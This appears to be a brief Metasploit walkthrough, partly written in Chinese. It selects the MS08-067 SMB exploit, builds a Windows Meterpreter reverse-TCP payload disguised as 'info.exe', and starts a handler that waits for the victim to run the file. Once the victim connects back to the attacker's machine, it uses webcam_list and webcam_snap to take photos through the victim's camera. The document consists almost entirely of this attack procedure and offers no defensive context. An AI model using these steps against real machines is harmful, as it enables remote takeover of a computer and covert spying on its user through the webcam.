msfconsole
show exploits
use windows/smb/ms08_067_netapi
show payloads
2.msfpayload windows/meterpreter/reverse_tcp LHOST=YoursIP LPORT=4444 x > /root/Desktop/info.exe
3.在linux的metasploit中執行
use multi/handler
set LHOST=YoursIP
set LPORT=4444
Exploit
在win8運行生成的info.exe
3.這時你發現victim連接上了攻擊機
4.用攝像頭抓圖
webcam_list
webcam_snap
稍后截圖自動打開